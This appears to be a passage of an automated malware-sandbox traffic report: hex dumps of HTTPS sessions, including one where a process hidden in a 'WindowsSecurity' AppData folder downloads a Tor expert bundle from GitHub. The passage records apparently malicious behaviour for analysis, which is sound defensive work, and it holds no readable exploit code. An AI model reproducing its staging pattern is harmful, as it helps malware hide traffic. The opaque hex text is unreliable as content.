30 36 3b d6 e9 d9 f4 a4 17 25 99 c7 89 11 99 07 39 66 37 f0 13 28 87 bc 2a 93 ca c9 78 29 6e 31 66 bc 2a 11 18 87 1d 0c 30 be Data Ascii: cFr"`Ou94\|CQwBUO'&Y?6ITX<BE Eul_l<65S3x&tyY"QQQ'1,N$Oqgdf9`LsHNcG$@p5.9R9sYre,nB06;%9f7(x)n1f0
2023-11-18 09:02:40 UTC	8556	IN	Data Raw: 6e f0 f2 ef e2 f1 0e c9 ae 5a b1 8b 27 2c e4 97 dc 79 77 ed e7 bb 78 9f ef e2 7d be 8b f7 a7 ec e2 f1 9b 5d 75 97 54 d9 76 f1 f8 2d 56 e8 8c bb 78 fc 36 57 e5 3b 7f 74 17 8f 7f 43 4a 95 d0 f0 dd b6 d6 1c 1f dc 6b 73 77 f1 f8 1d ae 7a 92 50 f5 94 d8 b4 d2 63 74 4c f0 d6 32 e1 78 f7 5a 19 99 13 09 a5 c4 80 90 38 f3 de 5f 8d be 78 20 bd 8f 56 87 4b 50 b4 8a 95 6e c5 91 aa 46 5f 36 b1 62 56 33 8e d8 9a e9 a9 b4 2e 77 38 80 ab cd fc 0f 58 64 d9 fc c2 cc 7e f9 6b 98 6a eb 6a b1 bb 53 7b 65 09 aa b2 ae e8 15 f1 3e e3 c4 c2 c2 c4 11 50 d7 af 25 69 0e 25 c5 75 00 14 d6 92 4e 38 9d ed c6 78 dd d4 15 13 0b d3 fa 34 39 ec 55 f5 cf 39 61 65 07 e4 2b e8 ea 09 d7 8b f5 b4 57 e0 0b 05 f4 a9 f4 01 2a e8 56 d7 53 08 a9 b5 3f a3 82 6e 5b 73 79 83 d8 c9 28 c3 54 f5 aa ba 59 Data Ascii: nZ',ywx}]uTv-Vx6W;tCJkswzPctL2xZ8_x VKPnF_6bV3.w8Xd~kjjS{e>P%i%uN8x49U9ae+W*VS?n[sy(TY
2023-11-18 09:02:40 UTC	8572	IN	Data Raw: ee d3 9c 0e 77 3e e6 7b 1c e3 f1 ea 81 d0 e0 30 6e 5a 31 9d 28 b7 70 8e c3 cd 33 a1 33 d3 a8 1a e0 ec 5b 45 e1 02 5f f7 c1 9d 17 37 69 83 a0 e7 fd 22 0a 67 90 9d aa 08 26 ca f7 45 80 06 9d ad fb d5 80 86 ff f0 3a c7 33 35 22 ca 3f 95 82 41 89 9a 17 aa 74 9b 08 72 69 81 1d ba d3 eb 70 ab 01 27 75 d9 c0 52 5d de 31 8f 1e d4 46 55 6f 28 48 94 db 45 bc ba 4b 75 86 e8 1e a0 5f bd 38 a4 b1 6d a1 8b 43 6a 20 98 cd 70 87 98 61 a7 e6 52 bd 42 15 ef 2c 64 16 29 f3 ae 42 14 fe db 3d ee f0 38 d5 2c ea 40 11 94 cb e1 63 ea 53 fd 4e b0 62 f4 ba c1 68 5b d0 e1 dd 85 68 97 36 9a 95 76 4f 29 69 46 15 89 72 6f 8e 39 79 3d 1a 6e 9a 32 73 81 79 5f b9 2f 47 bb ea 4e cd c9 73 c3 af 5b 73 8e 73 c9 83 7e 6d 78 24 e8 51 03 60 5c f7 97 97 05 2b 2b 66 7b a0 b0 be ce 90 df 8f 8d 36 Data Ascii: w>{0nZ1(p33[E_7i"g&E:35"?Atrip'uR]1FUo(HEKu_8mCj paRB,d)B=8,@cSNbh[h6vO)iFro9y=n2sy_/GNs[ss~mx$Q`\++f{6
2023-11-18 09:02:40 UTC	8588	IN	Data Raw: 43 37 53 d2 5d f0 0b d0 9c 5e 78 ac dd 40 a6 4e 84 35 04 2b ed d7 f9 71 b8 1c 27 e1 0c 4f e0 59 de 04 31 5b 01 b1 db e8 85 0e 23 4d 8f 82 6d 07 d8 8e 66 7a ee 67 f4 4c 87 f2 11 5f 40 9a ba 8d b8 2f a4 b8 d7 c0 76 00 6c c5 e2 96 d1 b1 42 07 e2 f9 65 78 1b 9c 47 16 f3 15 d8 03 06 70 ae 21 1d 60 e8 c5 4e 18 3a 92 d8 2d a4 7e 6a af e6 5b e0 f1 8a 1b bd 27 7a 6e 73 6a cd f4 96 2e f1 e5 f6 84 21 44 6e 92 3e 43 7a 36 ef 03 1c 6e f4 de 9a e6 f5 f0 13 37 ba a5 c0 ec e8 c2 b5 a9 ce 0d 58 cf 44 6e 93 fa 41 d5 cd d7 01 10 b7 da d9 e5 e7 2d e3 b7 02 b1 e4 fc 0d 43 03 99 b6 13 20 b8 d5 8e d6 7a 9c df b2 04 ae 3c 11 fb d8 af 69 3f f2 7e 23 fe e2 34 73 e7 0f a0 e2 c1 9a f6 ae 35 2b 3a 5b 4f ab d8 41 37 3c f1 92 f0 db c4 89 b9 59 6b 8e 04 3e c5 d2 16 66 d9 01 6d 79 05 2f Data Ascii: C7S]^x@N5+q'OY1[#MmfzgL_@/vlBexGp!`N:-~j['znsj.!Dn>Cz6n7XDnA-C z<i?~#4s5+:[OA7<Yk>fmy/
2023-11-18 09:02:40 UTC	8604	IN	Data Raw: 05 6e 6c 2c 65 b1 b1 94 c7 c6 52 0e 1b 4b 59 6c 2c e5 b1 b1 94 c6 c6 52 1e 1b 0b 5c d8 58 ea c0 c6 52 3b 36 96 3a b1 b1 d4 85 8d a5 0e 6c 2c b5 62 63 a9 03 1b 4b ed d8 58 6a c7 c6 52 2f 6c 2c f5 c7 c6 52 3f 6c 2c e5 b1 b1 d4 86 8d a5 16 6c 2c e5 b1 b1 d4 8a 8d a5 36 6c 2c b5 60 63 29 8b 8d a5 56 6c 2c b5 60 63 29 8f 8d a5 4e 6c 2c e5 b1 b1 d4 86 8d 01 8b 8d 01 8f 8d 01 89 8d 81 0b 1b 03 37 36 06 3c 36 06 36 6c 0c 2c d8 18 d8 b0 31 b0 61 63 e0 c0 c6 c0 85 8d 01 8b 8d 81 81 8d 01 8f 8d 01 87 8d 81 03 1b 03 16 1b 03 1e 1b 03 2b 36 06 4e 6c 0c 1c d8 18 b8 b0 31 20 b1 31 a0 b1 31 a0 b1 31 b0 63 63 e0 c2 c6 c0 8d 8d 81 1d 1b 03 17 36 06 6e 6c 0c ba c0 c6 c0 8a 8d 81 1b 1b 03 3b 36 06 6e 6c 0c 2a 5e d8 58 5a 71 62 63 a9 27 36 96 7a 61 63 e0 85 8d 81 27 36 06 be Data Ascii: nl,eRKYl,R\XR;6:l,bcKXjR/l,R?l,l,6l,`c)Vl,`c)Nl,76<66l,1ac+6Nl1 111cc6nl;6nl*^XZqbc'6zac'6
2023-11-18 09:02:40 UTC	8620	IN	Data Raw: a0 33 25 46 0d 99 b6 a8 51 3c 8e 9e 68 5d 88 6b a0 ac 4e 5c 09 84 37 ef e3 02 5c b2 e7 80 4c 8b 86 d9 19 2e e8 6a 7d bc 21 aa 53 43 0b 05 b1 b1 5d fd 81 90 12 da ad af a6 6a f4 dc df d7 0e 46 73 c9 94 a0 60 73 9c 42 9c 9d 6b 74 1b f5 78 6e f9 17 86 9b 3a 3d 8b 46 af 0e d4 78 d0 12 9c fa 28 44 06 ca b6 5d 7d 5c 6b b9 01 3a 75 4f 8d 71 9d 0a 0d de 0b 05 76 2f a5 dc 4b 4c bc d7 89 a2 00 35 1b 13 43 45 2d 31 18 28 96 59 be 62 b3 c0 89 31 4a a7 9b a5 77 38 a0 1b a4 be d2 90 9d 6a f1 0c 38 70 36 e3 11 01 6d f1 75 09 a5 88 22 61 3a 5b 17 5a 3c 94 68 6d 0a 46 39 85 37 88 29 22 02 9d 4a dc 88 f3 ed 38 d5 37 25 48 24 f8 09 9a 58 3f 85 e6 6e 0a e2 d0 42 53 54 5c 9f 1b 01 45 ff 14 ab e3 26 d4 70 93 38 3c b0 1d 7e 93 5b 0f 2a 2a b0 98 78 bc 58 44 00 29 ba 10 8d 5c 48 Data Ascii: 3%FQ<h]kN\7\L.j}!SC]jFs`sBktxn:=Fx(D]}\k:uOqv/KL5CE-1(Yb1Jw8j8p6mu"a:[Z<hmF97)"J87%H$X?nBST\E&p8<~[**xXD)\H
2023-11-18 09:02:40 UTC	8636	IN	Data Raw: dd 9d e6 34 47 01 7f e9 32 34 bf 09 98 79 a0 79 0b a3 19 a5 34 0d f1 8c e6 6b d8 79 fb cc 69 6e 83 bc 45 c4 54 c9 6a 7d 81 9e 01 f5 63 2e b0 23 5c db a0 96 72 83 3a 26 c8 a4 88 f5 04 a0 02 e7 3e 6b de 7b e0 61 a4 2a cf 7b af 0b 75 d8 82 f7 c7 00 ef b5 a0 89 63 e4 0c 3c 1c 07 9a 7b 85 12 9b dc ef 2a 30 b4 8c 87 12 fe ed 93 e4 b4 c8 f4 04 ff 08 40 95 45 7d a8 3f d5 a0 c4 b3 55 3a 7b 03 0d e9 61 ea 66 2c 1f 4e 3b 02 e5 fc 16 b4 d1 4e 8c 02 66 01 68 7f bd c0 e6 87 d0 e6 87 d0 e6 c3 20 19 03 0b 1f 2a b2 f0 b4 ff 0d da 16 98 90 be 24 4e da 4f 13 aa 07 40 7b 9b 45 fd c8 fb 25 c0 8c af 93 d5 2d ac 7f fa 70 8c 99 ea 7f 19 f4 b9 05 3d 1c 9b cd 80 99 01 7a 2d 3a 59 65 f8 d8 6c 71 0b 96 f2 1a 87 b2 bb 2d e8 23 e6 59 8c d6 5c 2f ab 55 16 98 d7 00 e3 5f cf ec 99 19 66 Data Ascii: 4G24yy4kyinETj}c.#\r:&>k{a{uc<{0@E}?U:{af,N;Nfh *$NO@{E%-p=z-:Yelq-#Y\/U_f
2023-11-18 09:02:40 UTC	8652	IN	Data Raw: 98 fa eb f2 80 75 06 1f 93 07 6c 90 71 68 b0 78 4d be c1 ca 25 59 0a da 60 13 d0 16 9b 80 36 d9 04 b4 cd 26 a0 8d 36 01 6d b5 09 68 b3 43 46 08 36 8b 7b c4 ad 04 16 90 3e a2 0d 5b 43 7e 9a 3a 2f 8d b3 a3 52 a1 34 35 5e 1a c7 a3 12 70 28 99 4c 6b 79 5f 4b 9f 01 87 88 1c 0e c9 2a 3e c6 c3 eb 0c ce 65 d7 7b 65 d7 87 b7 55 c9 42 63 2a 16 8b c5 e3 7d 1c cd fb 3f ff 52 ed 91 ec bb b3 31 87 73 ab 47 35 80 3b b5 af 4b 48 e0 27 84 d4 c8 6a 03 38 56 ec 00 c0 cb 85 0e 98 4d 49 86 d1 38 85 4a 4b 60 10 21 ff 28 4f 9e 00 6f d2 88 e5 84 3c 5f 2a 81 1e 42 b6 0f 90 00 10 fc 65 10 48 7f 7f 78 1e 81 5d 1a bb 87 90 a1 e5 12 00 32 47 9c 71 00 8f ae 90 88 36 42 6e d4 00 90 7f 96 2d 0d e0 0e 8d f8 94 90 bf af 94 00 16 96 a5 1a 58 45 c8 af 35 30 82 04 ee 9c 6a 09 00 b9 58 b6 e8 Data Ascii: ulqhxM%Y`6&6mhCF6{>[C~:/R45^p(Lky_K>e{eUBc}?R1sG5;KH'j8VMI8JK`!(Oo<_*BeHx]2Gq6Bn-XE50jX
2023-11-18 09:02:40 UTC	8668	IN	Data Raw: 8b b6 e6 45 5b 73 db f5 9a 4a 6e e1 3f fd 66 f1 19 b3 ac fc a2 e7 b8 3d 6a fa 7b ec 45 fa 02 61 7e 63 09 5f c4 e3 ea 0e b3 2b 52 6b 78 85 89 9f 5b 74 fc 3c 9f e3 ea f9 06 6f 0a e7 9b b6 e4 ae 26 09 fe 45 55 f2 79 6f 3c 92 34 b3 ce 59 21 33 38 86 be 56 c7 d0 33 b8 41 e8 88 f8 5b a7 da 88 78 a5 2a e8 77 99 84 04 d8 ef 8a 6c 42 82 55 c4 17 86 bb 38 a3 c1 48 aa 0c 9c 5c 46 8c 4f 15 19 3e 35 de 2f b4 d9 a1 69 13 17 5f 6b b2 48 80 0c 11 1b d4 1f 96 2d b3 b4 38 93 48 8c a7 44 3f 18 4a 79 15 6c e3 4e a3 8d 17 1f a9 4e 1f 60 aa 44 d7 40 2e 21 fa 5c 05 96 31 fb 46 d6 56 7f 0d 64 15 ec 12 05 55 03 11 8d 9c af 03 25 9c 8e 0a 5e 46 03 35 c0 46 72 b9 7f 1e 58 c9 ce e0 b4 5d ca bc 44 f9 e1 f2 12 0a 0a db 1a 4d 60 bc 9c 5b 56 35 96 06 39 74 69 1f 51 ba ed 8a 32 f9 7c 45 Data Ascii: E[sJn?f=j{Ea~c_+Rkx[t<o&EUyo<4Y!38V3A[x*wlBU8H\FO>5/i_kH-8HD?JylNN`D@.!\1FVdU%^F5FrX]DM`[V59tiQ2\|E
2023-11-18 09:02:40 UTC	8684	IN	Data Raw: bd 4b e0 d5 48 e0 95 95 ac e6 75 49 c1 6b 3b ab bc 02 02 af 02 c1 6b b1 ec ab 93 db af 0d 84 35 0c f9 07 80 e9 21 74 6d cf f0 85 ea ef 9b 0e 89 3e ff 65 7c 8c 46 e0 7e d2 0e dc c7 a0 6d 5c 33 81 e9 dc 64 f5 a9 34 69 5d 14 3b 41 f1 3e 24 81 69 d3 15 64 5a 4f 60 9a 74 04 98 fe 1a 8d d3 27 ef 56 33 3d 38 09 98 3e 86 8f e3 08 4c d3 8b 81 e9 55 28 d3 56 02 d3 5a 02 d3 11 0a a6 07 78 5e 9d 4f c8 ab f3 81 69 53 d4 99 6e 26 30 7d ed 34 30 7d 19 8d d3 f3 8b d4 73 29 b7 5f 0f 4c 7f 8b 8f f5 08 4c c7 2e 05 a6 4e 94 e9 29 02 d3 9d c9 ea 93 08 66 28 98 f2 33 b6 5b 08 4c 5b 04 d3 9a a8 8f 1d b6 11 c6 0e f3 2e 01 d3 37 d1 38 5d b0 44 cd f4 d2 64 60 fa b0 86 8e 07 ad 84 6f 10 4a 80 e9 cd 28 d3 4b 04 a6 ed c9 fa dd 75 90 35 42 0a a6 27 f8 7c cb 5d 84 f9 96 bb 80 e9 e0 a8 Data Ascii: KHuIk;k5!tm>e\|F~m\3d4i];A>$idZO`t'V3=8>LU(VZx^OiSn&0}40}s)_LL.N)f(3[L[.78]Dd`oJ(Ku5B'\|]

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	185.199.108.133	443	192.168.2.4	49750	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:38 UTC	811	OUT	GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231118%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231118T090238Z&X-Amz-Expires=300&X-Amz-Signature=70af1f9a98f6f7decd9243215e43e906d5d375fed061f16f63b7782e965ba97c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
2023-11-18 09:02:39 UTC	840	IN	HTTP/1.1 200 OK Connection: close Content-Length: 6710958 Content-Type: application/octet-stream Content-MD5: 9OeRN6tLfAr39BD4dWG/Iw== Last-Modified: Thu, 27 Jan 2022 16:21:05 GMT ETag: "0x8D9E1B104D9C2C4" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 5d8e3c6d-601e-005e-2d79-180ab5000000 x-ms-version: 2020-04-08 x-ms-creation-time: Thu, 27 Jan 2022 16:21:05 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=tor-expert-bundle-v0.4.5.10.zip x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 0 Date: Sat, 18 Nov 2023 09:02:39 GMT X-Served-By: cache-iad-kcgs7200078-IAD, cache-bfi-kbfi7400096-BFI X-Cache: HIT, MISS X-Cache-Hits: 933, 0 X-Timer: S1700298159.132785,VS0,VE124
2023-11-18 09:02:39 UTC	841	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 40 9b 10 53 2c f6 1c 9f 95 e7 05 00 94 e5 10 00 0e 00 00 00 6c 69 62 73 73 6c 2d 31 5f 31 2e 64 6c 6c ec fd 0b 74 14 55 12 38 0e 77 cf 74 c2 04 06 7a d4 01 83 66 25 68 ab 89 44 cd 68 d4 8c 04 0d 49 48 22 44 88 12 81 15 54 54 44 1e 59 45 9c 01 d4 2c 04 7a 26 a4 6d 07 a3 e0 1b 5f ab bb 8b 8b ba ec aa bc d5 3c 80 80 cf 88 22 ac f8 60 15 b5 c7 80 82 28 84 57 e6 7f ab ea 76 4f cf 24 ac fe 7e e7 fb 9f f3 7d e7 7c 9c 43 a6 bb ef ab 6e dd ba 75 eb d6 ad aa 7b f5 f5 0d 82 53 10 04 89 fd 8f c5 04 61 b5 40 ff 0a 85 df fe 57 cb fe f7 19 b0 b6 8f f0 7a da fb 03 57 8b 15 ef 0f ac 9a 32 f5 ee cc 19 33 ef bc 7d e6 cd 7f ca bc f5 e6 3b ee b8 33 90 79 cb 6d 99 33 83 77 64 4e bd 23 b3 64 d4 e8 cc 3f dd 39 e9 b6 0b 7a f7 ee a9 f0 3a 2a 87 09 42 Data Ascii: PK@S,libssl-1_1.dlltU8wtzf%hDhIH"DTTDYE,z&m_<"`(WvO$~}\|Cnu{Sa@WzW23};3ym3wdN#d?9z:*B
2023-11-18 09:02:39 UTC	842	IN	Data Raw: e2 4a 86 41 ad c5 1c 17 e3 95 67 78 d5 0c af ff 82 e7 3c a8 44 02 6a 33 a6 02 f4 1b 14 3e 6d 5b 38 1f 63 28 1d 42 bf 6e ac 9e 35 39 94 de a5 59 c4 6f 32 a1 e2 82 a7 b0 30 f5 9a 21 ec 3a c6 30 7d 3b d5 3d 39 0c b6 12 bd 46 29 0c 1f 0c dc a9 15 28 46 0b 6b 55 47 66 22 c3 f8 16 28 ac 97 19 c6 5e f8 5a a2 54 30 34 49 5a 0e 7c 73 b3 d7 72 c0 80 f1 af ef 44 81 be 49 5a 8b b1 f8 0f 0e 41 db a4 76 b8 66 bb d9 90 67 c4 94 b0 87 81 d5 e0 3b 48 f0 62 05 ac 99 d7 9f 06 78 72 b4 1d 7c fe e8 c3 5d e1 2d 72 e8 4d 41 c0 76 74 c1 59 e4 d6 8a dc fe 26 59 7d 09 c8 a9 48 12 5b 8b 50 dc 60 4d 19 af fe 22 0a ed af 43 3f 00 d0 34 f6 d5 77 10 6a 9d c5 6a 6d 5f 6a 7e ef 69 7d bf 11 be 87 cc ef 50 0d 2d 09 2c a9 98 25 45 27 5b 7c cc 4a 77 f0 f4 b3 20 bd b4 6b ba 93 a7 3b 21 fd 1c Data Ascii: JAgx<Dj3>m[8c(Bn59Yo20!:0};=9F)(FkUGf"(^ZT04IZ\|srDIZAvfg;Hbxr\|]-rMAvtY&Y}H[P`M"C?4wjjm_j~i}P-,%E'[\|Jw k;!
2023-11-18 09:02:39 UTC	844	IN	Data Raw: 10 8f 1a 6f 8a b5 29 fb 19 d7 6a 45 39 95 bd 9d ca ba c2 50 ec 06 78 4d 9a fd 13 5f a8 d6 41 59 10 21 d8 f3 85 58 7b a0 2f ed 92 51 de 64 9f 7d 3b 8d 59 4b 88 bd dd b1 84 18 e7 e4 25 20 6b 78 7c 8d 66 b6 86 f8 5b e2 fe 0e e5 79 a3 94 83 ff e3 62 6c 60 b8 d6 62 02 9a 01 43 b2 89 7d eb 07 54 03 6d fc 83 f2 a4 d2 ca 0b 5f 3a 16 53 ab fb 16 a7 08 49 3b 80 86 e4 77 6c 8f 63 c6 98 b7 98 e3 e5 0a b3 b9 bd b0 f6 43 73 65 48 ea 79 a0 75 c8 31 ce 05 d9 37 d0 3d 7e 9e a2 46 41 ac 6a 61 e3 61 bc cb f2 b6 6f b5 e4 11 c2 cf 18 96 a9 fd 3f 80 08 6b ff 02 75 f4 60 ac 16 5a bd 72 71 8a 60 bd b7 60 cb ec 6b 36 74 74 67 60 18 c2 73 25 b4 15 7b d8 5c fd 7f 65 4f fa 29 e1 ad 81 73 71 3d 1d 88 c8 61 33 ec f8 76 9c d9 8f 34 32 90 e4 95 b6 8e 9b 78 e0 fb 1d 26 fc 04 4f 6e 2f 43 Data Ascii: o)jE9PxM_AY!X{/Qd};YK% kx\|f[ybl`bC}Tm_:SI;wlcCseHyu17=~FAjaao?ku`Zrq``k6ttg`s%{\eO)sq=a3v42x&On/C
2023-11-18 09:02:39 UTC	845	IN	Data Raw: b1 5b 68 92 2c f1 71 b4 43 98 f7 55 78 cb bc 1c c4 17 b2 8a f6 0f 1b 54 43 9c df 04 08 65 d5 ec 6c 5f d5 e0 7f 08 6a 9e f7 78 fb 97 86 ef fe 14 c1 d7 d8 be bc fb f5 4f 5f 8c 6b ca 82 39 9c a5 b6 2e a8 b1 9e 6a f9 13 5f 77 6a 43 66 4a 6d bd 99 82 02 44 6b 9d 39 39 e6 6f 0a 71 16 3a bd 55 b4 64 d3 e4 59 19 ab 4f 11 cc 75 9c d6 c9 3f a7 d2 3a 79 c9 05 5d d7 81 e7 2f 34 d7 49 be ae 41 39 06 7e 96 3e 41 c9 25 f0 75 04 55 6d 14 35 7c f0 6d 55 3b 1c b3 dd ea 86 2c ad 6d 7c 5c ce 5a 7d 31 32 fe c0 59 66 0b 58 a8 c3 3d 7b 8c 6f ab 99 d7 26 1f 1b ab 37 89 d6 b8 da bb 71 21 ef 46 3e eb 06 b5 ef 5f 00 fc 76 56 aa 86 bf 04 4d fb 5f 59 5e ef 9f 45 d2 99 c3 42 0d 75 e5 d3 bb eb 0a d1 b6 b5 63 6d 55 04 9c c2 5a 78 41 dd 6f b7 fc 7e 02 a3 6f f5 44 f4 bd 0e 19 51 17 3e e2 Data Ascii: [h,qCUxTCel_jxO_k9.j_wjCfJmDk99oq:UdYOu?:y]/4IA9~>A%uUm5\|mU;,m\|\Z}12YfX={o&7q!F>_vVM_Y^EBucmUZxAo~oDQ>
2023-11-18 09:02:39 UTC	846	IN	Data Raw: 01 11 2d 7a 6e 2c 01 fe 21 49 25 9f ed a6 e4 27 f7 61 c9 bd 5c cf 3b 96 15 69 7f 17 32 b9 38 7a 5f 98 4b 9a d7 d5 8c cc 58 c6 0d 3c 63 46 52 dd e7 75 83 9b 39 54 f7 43 bc 48 4e 52 91 5f ba 01 67 18 15 b9 11 b6 48 6b e6 a1 78 ec 29 07 98 36 11 d1 cb a1 01 74 6a a2 00 f5 6b 1f 45 3b 49 61 ee b9 87 65 8a ca c0 e6 89 42 0b 6b 00 e8 cd 6c 96 31 9a 9e 10 61 bc 9f 14 55 78 e6 50 61 52 e9 32 96 3e bf 46 99 00 2b 98 bc f0 49 98 93 c5 d2 fc 7c 98 50 72 68 04 bc 3a 81 42 60 30 47 94 3a 2c 61 47 6d ec cd 6d 29 60 5d 03 39 a9 06 e4 b9 7a 2f 51 d9 36 06 0b 7c b3 ab 55 4d a5 e1 2f 19 94 e7 5f 0e 3a 92 80 3c 0e 48 b3 d5 d3 c6 f3 44 a0 9e 10 ce 1e c8 e6 4a ca 16 3d 83 b2 4d 8e 37 47 36 2e 2c ed fd d3 28 6d 78 37 a0 38 79 9e a9 bc 99 73 6c 79 9c f6 93 1d d0 8f f1 3c 0e 5b Data Ascii: -zn,!I%'a\;i28z_KX<cFRu9TCHNR_gHkx)6tjkE;IaeBkl1aUxPaR2>F+I\|Prh:B`0G:,aGmm)`]9z/Q6\|UM/_:<HDJ=M7G6.,(mx78ysly<[
2023-11-18 09:02:39 UTC	848	IN	Data Raw: b8 4f 81 d6 91 a8 4f 83 fa ae 4d aa ef e6 6e ea 0b b0 fa da 5f a5 fc e3 92 f2 4f eb 26 7f 09 cb 1f bd 2f de 31 d0 5b 91 c1 c8 f0 69 dc 68 ad 43 3b 25 49 bd c7 f7 57 65 ec f1 6d f1 77 34 f2 d5 1d ac 91 73 13 fc 03 80 ff 44 1a 3c 24 95 bb a2 ef c7 35 5c 71 fe 14 69 d8 9d c2 d3 5f e9 92 ce 18 28 a3 db 2c 7d 01 e4 01 3b 0e d2 97 e9 0b da 50 79 14 d8 a7 d7 42 ed 2d 96 de ab a5 2b ff ab 35 52 4c ae b7 7a d7 4d 09 f6 30 ab 27 26 bd ef ba 31 29 3d e9 7d d7 0d 49 e9 49 ef bb 26 24 a5 27 bd ef 1a 9f 94 9e f4 be eb fa a4 f4 a4 f7 5d 7f 4c 4a 4f 7a df 35 2e 29 3d e9 7d d7 d8 a4 f4 a4 f7 5d 63 92 d2 93 de 77 5d 97 94 9e f4 be ab 2a 29 3d e9 7d d7 e8 df c0 f7 84 df e8 ef 8d bf 81 cf 3f fe c6 78 8d 4f 4a ff 2d fc 8c f9 df fd e9 82 df 31 dd e0 27 61 bd d5 36 8d 06 29 65 Data Ascii: OOMn_O&/1[ihC;%IWemw4sD<$5\qi_(,};PyB-+5RLzM0'&1)=}II&$']LJOz5.)=}]cw]*)=}?xOJ-1'a6)e
2023-11-18 09:02:39 UTC	849	IN	Data Raw: 23 f3 f1 2e 3e 30 62 1b 0c d2 09 46 e7 94 db f8 e8 04 2a 92 07 44 5e f8 19 8c 04 0d ca d1 ff 31 28 dd d8 97 fd 5e bc 4e ba 15 bd b5 ba f0 67 db 37 da af 14 7b 00 c7 bc 6b bf 41 71 57 4e b2 28 0e 4e 91 81 bd 66 a2 bf ab 0d 52 58 e0 24 25 99 4c 8c 9a 49 16 8d d8 40 98 25 d8 c6 7b e8 ef 1b ef cf 26 a1 41 f1 63 09 63 bd b6 d3 1c eb 15 36 f5 0f 23 44 b4 3f 29 61 4c 67 82 92 cb 4a 55 5a 23 fc 7f d4 f1 52 86 4d 9c 21 34 a2 a7 99 56 28 b3 84 64 8b 94 df 3b 3e 1b 6e 46 ba 5f 89 fb 91 42 a8 b4 2f a8 65 b4 4a e2 d8 96 3e 20 79 ff 02 c6 cf 60 1a 32 d2 cb b8 ed b5 60 ef ea 1e 34 d4 1d 4c 3d 38 d4 e3 0c 16 e9 7f 74 31 31 6e 10 63 ca 8c 81 96 e8 f7 48 e2 57 91 aa cb 63 8c e1 7f a5 1d c5 79 59 ef 50 7f 40 79 ee 63 92 e7 f4 34 c6 fd d6 92 c6 91 b1 f6 86 f1 be c6 f8 62 01 Data Ascii: #.>0bF*D^1(^Ng7{kAqWN(NfRX$%LI@%{&Acc6#D?)aLgJUZ#RM!4V(d;>nF_B/eJ> y`2`4L=8t11ncHWcyYP@yc4b
2023-11-18 09:02:39 UTC	850	IN	Data Raw: 0b ee 6a 2d e5 72 03 58 64 a3 7f 5d 01 64 f7 72 12 9b 41 84 0e 47 5b c6 9a 71 29 02 df 7f 17 ea c3 25 fd e4 d6 42 3a 65 f5 e8 60 20 57 2e 69 95 2e 46 82 f1 75 e9 54 f3 08 20 89 6e 67 c4 e9 16 0f 0c 77 8c 21 e7 8e f6 a6 c9 36 ff 3e d7 59 66 76 0e f2 1f c7 a5 74 8d df c4 e1 cd 4a 84 d7 85 fb df b1 08 6f 6f 84 c9 3e 9f 06 9d 00 ae bb 92 e0 2a e4 70 d9 2a b0 c3 77 51 12 7c 6b c6 76 03 df 75 63 7d 31 5a 71 ab 51 c3 91 a7 df 00 78 ef d9 7e 23 8f 6b d2 62 99 14 71 27 d8 f3 56 02 d8 f3 ce 61 fb c2 62 b7 f6 15 f8 01 b4 96 12 a2 f7 69 77 bb 61 d9 b4 4d 71 ed 46 26 46 05 4e d2 c0 4a 3e 43 db 67 c9 4f 5a 50 b0 7d 48 d0 c3 26 f0 3b a4 3f 1b 7d 22 7d 81 1a 30 45 2f 77 6b 3d 5b ac f8 58 a4 9f 4d 67 b0 7b da fd 71 fe c2 72 9e a9 7d a5 8f 77 27 74 a3 40 31 6e 7d 03 09 8c Data Ascii: j-rXd]drAG[q)%B:e` W.i.FuT ngw!6>YfvtJoo>pwQ\|kvuc}1ZqQx~#kbq'VabiwaMqF&FNJ>CgOZP}H&;?}"}0E/wk=[XMg{qr}w't@1n}
2023-11-18 09:02:39 UTC	852	IN	Data Raw: cc 38 c6 e4 06 2b 1e dd a9 b6 78 74 b5 24 65 41 5e e3 85 91 24 31 2f 06 10 ea 0c 58 b5 5a 8c c9 60 f6 59 9c 69 dc 88 bf 59 c6 98 83 a0 6e ca d4 8a 73 99 80 9b a1 8f 86 a3 a1 be 74 20 d1 18 70 83 42 a3 8d 2b 34 60 c7 f6 38 e4 2e c6 10 3f 11 7c cc 85 c7 05 07 11 45 00 cb b9 bc db 00 87 51 34 12 34 a5 ad d8 b4 a9 1e 69 4b 88 73 97 ce e5 bd da 24 79 ef 3e db fe a9 aa 82 e2 dc 6d a5 b2 16 7d c6 cf 03 0a f5 15 d0 44 7b a9 c9 97 5d 57 d9 c0 80 b3 c5 42 74 81 fc f7 d5 a4 a8 1b 9e 98 0a 49 8f 5d 4d be 4d a7 fe ca 7a 55 8a 46 87 0f 40 af 20 b8 c1 ab ed c3 b8 de cb 55 d9 6d bd d7 f3 7a af e9 5a ef 95 bc de b7 7f 81 7a 11 71 79 dd d4 3b b6 db 7a 1d bc de 71 5d eb fd be 82 ea bd 1d eb c5 51 f8 fc 57 b3 de c8 5c 49 db cf be ea 77 64 a9 df 1f d3 c7 64 66 1f c6 58 02 3b Data Ascii: 8+xt$eA^$1/XZ`YiYnst pB+4`8.?\|EQ44iKs$y>m}D{]WBtI]MMzUF@ UmzZzqy;zq]QW\IwddfX;
